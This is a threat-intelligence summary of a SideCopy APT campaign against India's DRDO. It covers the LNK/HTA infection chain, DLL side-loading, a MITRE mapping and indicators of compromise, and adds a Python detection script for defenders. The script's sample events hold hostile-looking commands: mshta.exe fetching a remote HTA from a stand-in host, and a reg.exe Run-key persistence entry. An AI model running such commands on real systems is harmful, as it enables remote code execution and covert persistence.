SideCopy APT, a Pakistan-based actor active since 2019, targets South Asia with a multi-stage infection chain that leverages LNK and HTA loaders to deploy DLLs and final payloads. The campaign against India’s DRDO demonstrates DLL side-loading, anti-virus evasion, and a remote-control/information-stealing payload stage. #SideCopy #DRDO #SideWinder #TransparentTribe #APT36 #PantomimeHTA #PreBotHta #DUser.dll #cridviz.exe #AuToStealer
Key points
- SideCopy APT is a South Asian-focused actor (Pakistan-based) active since 2019, linked to groups with similarities to SideWinder and Transparent Tribe.
- The campaign highlighted targets the Indian government entity DRDO, signaling interest in defense-related victims.
- Infection starts with a spam email that delivers a ZIP containing an LNK file; users run the LNK to begin the chain.
- The chain uses mshta.exe to fetch remote content, redirecting to a URL hosting an HTA file (pantomime.hta) that decodes and drops a PPT payload.
- DLL side-loading is used: credwiz.exe is copied/masqueraded and a malicious DUser.dll is loaded via a loader sequence, with various paths chosen to evade detection.
- The final payload includes an Action RAT and AuTo Stealer for data collection, C2 communications, and potential information exfiltration.
- Persistence is achieved by dropping a batch file (test.bat) to create a startup entry for cridviz.exe, ensuring re-launch on boot.
MITRE Techniques
- [T1566] Spearphishing Attachment – The initial infection starts with a spam email containing the link to the malicious file hosted on the compromised website. “The initial infection starts with the user extracting a zip file and then running the .lnk file on their machine.”
- [T1204] User Execution – The user extracts the ZIP and runs the LNK file inside it, which starts the rest of the chain. “The initial infection starts with the user extracting a zip file and then running the .lnk file on their machine.”
- [T1047] Windows Management Instrumentation – The loader uses a WMI query to gather antivirus details. “The loader uses a WMI query, specifically ‘Select * From AntiVirus,’ to gather the names of installed antivirus products.”
- [T1170] Mshta – The chain triggers mshta.exe to connect to a remote URL. “Once the .lnk file is executed, it triggers a command that launches ‘mshta.exe’ to connect to a specific URL.”
- [T1129] Shared Modules – The HTA-based stage loads code and payloads into memory via dynamic invocation. “the hta file decodes and decompresses the PPT file encoded in Base64 format. Consequently, it saves the decompressed Microsoft PowerPoint file in the ‘%temp%’ folder… and launches it.”
- [T1036] Masquerading – The loader drops files under different names and directories, chosen according to the installed antivirus product, for defense evasion. “The loader utilizes various directories to drop the files ‘credwiz.exe’ and ‘DUser.dll’ using different names based on the type of AntiVirus software installed.”
- [T1547] Registry Run Keys / Startup Folder – Persistence via startup entries for cridviz.exe. “This loader DLL file also drops a batch file named ‘test.bat’ in the %temp% directory, which creates an auto startup entry for the ‘cridviz.exe’ file using the ‘reg.exe’ utility.”
- [T1016] System Network Configuration Discovery – Host discovery via WMI enumeration of installed antivirus products. “The loader uses a WMI query, specifically ‘Select * From AntiVirus,’ to gather the names of installed antivirus products.”
- [T1071] Application Layer Protocol – C2 over HTTP. “The RAT transmits data to the Command-and-Control (C&C) server via HTTP request.”
- [T1105] Ingress Tool Transfer – The chain downloads and executes HTA/loader content from remote URLs. “the hta file is downloaded and executed in the path mentioned below” and the C2 URL references are shown.
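To turn the chain above into something a SOC can alert on, here is an added example (not code from Cyble's report or from SideCopy's tooling) that runs four host-based detection rules over constructed Sysmon-style process-creation and WMI-activity events: mshta.exe launched with a remote URL, the renamed credwiz.exe (cridviz.exe) running outside C:\Windows, reg.exe writing a Run-key value that points into %TEMP%, and a WMI query enumerating antivirus products. The event field names, the Run key as the persistence location and the %TEMP% drop path are assumptions.

```python
import re

# Constructed events (not real telemetry) modelled on the SideCopy chain
# summarised above; the field names are assumed, not a real log schema.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe https://www.example.invalid/js/files/x/pantomime.hta"},
    {"image": r"C:\Users\u\AppData\Local\Temp\cridviz.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "cridviz.exe",
     # the loader DLL side-loaded into cridviz.exe issues the AV query
     "wmi_query": r"root\SecurityCenter2 : Select * From AntiVirus"},
    {"image": r"C:\Windows\System32\reg.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v cridviz'
                r' /t REG_SZ /d "C:\Users\u\AppData\Local\Temp\cridviz.exe" /f'},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},  # benign event, should not match anything
]


def _is(image, name):
    """Match the process image by file name, ignoring case and directory."""
    return image.lower().endswith("\\" + name)


RULES = {
    "T1170 mshta.exe launched with a remote URL":
        lambda e: _is(e["image"], "mshta.exe")
        and re.search(r"https?://", e["cmdline"], re.I) is not None,
    "T1036 credwiz.exe/cridviz.exe running outside C:\\Windows":
        lambda e: re.search(r"\\(credwiz|cridviz)\.exe$", e["image"], re.I) is not None
        and not e["image"].lower().startswith("c:\\windows\\"),
    "T1547 reg.exe adding a Run-key value that points into %TEMP%":
        lambda e: _is(e["image"], "reg.exe")
        and re.search(r"\\currentversion\\run\b", e["cmdline"], re.I) is not None
        and re.search(r"\\appdata\\local\\temp\\", e["cmdline"], re.I) is not None,
    "T1047 WMI query enumerating installed antivirus products":
        lambda e: re.search(r"from\s+antivirus", e.get("wmi_query", ""), re.I) is not None,
}


def match_events(events):
    """Return (rule name, image) pairs for every event that trips a rule."""
    hits = []
    for e in events:
        for name, pred in RULES.items():
            if pred(e):
                hits.append((name, e["image"]))
    return hits


if __name__ == "__main__":
    for name, image in match_events(SAMPLE_EVENTS):
        print(f"[{name}] {image}")
```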
Indicators of Compromise
- [File Hash] DRDO-K4-Missile-Clean-room.zip – MD5 0725318b4f5c312eeaf5ec9795a7e919, SHA1 9902348fc5dffe10a94a3f4be219dc42330ed480, SHA256 9aed0c5a047959ef38ec0555ccb647688c67557a6f8f60f691ab0ec096833cce
- [File Hash] DRDO – K4 Missile Clean room.pptx.lnk – MD5 ab11b91f97d7672da1c5b42c9ecc6d2e, SHA1 feeadc91373732d65883c8351a6454a77a063ff5, SHA256 a2e55cbd385971904abf619404be7ee8078ce9e3e46226d4d86d96ff31f6bb9a
- [File Hash] pantomime.hta (Stage 1) – MD5 cbaa7fc86e4f1a30a155f60323fdb72a, SHA1 d7dcea1c35475caa85e9298e44b63d3ce43fb2f0, SHA256 e88835e21c431d00a9b465d2e8bed746b6369892e33be10bc7ebbda6e8185819
- [File Hash] jquery.hta (Stage 2) – MD5 036da574b5967c71951f4e14d000398c, SHA1 e612dbb34e01b41e46359019db9340e17e0390b8, SHA256 85faf414ed0ba9c58b9e7d4dc7388ba5597598c93b701d367d8382717fb485ec
- [File Hash] DUser.dll (Action RAT) – MD5 2e19b7a2bbdc8082024d259e27e86911, SHA1 3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5, SHA256 865e041b41b9c370a4eed91a9a407bd44a94e16e236e07be05e87de319a4486c
- [URL] Malicious ZIP file download link – hxxps://www.cornerstonebeverly.org/js/files/DRDO-K4-Missile-Clean-room.zip
- [URL] Target command URL – hxxps://www.cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso
- [URL] pantomime.hta URL – hxxps://www.cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso/pantomime.hta
- [IP] C2 Server – 144.91.72.17:8080
Read more: https://blog.cyble.com/2023/03/21/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/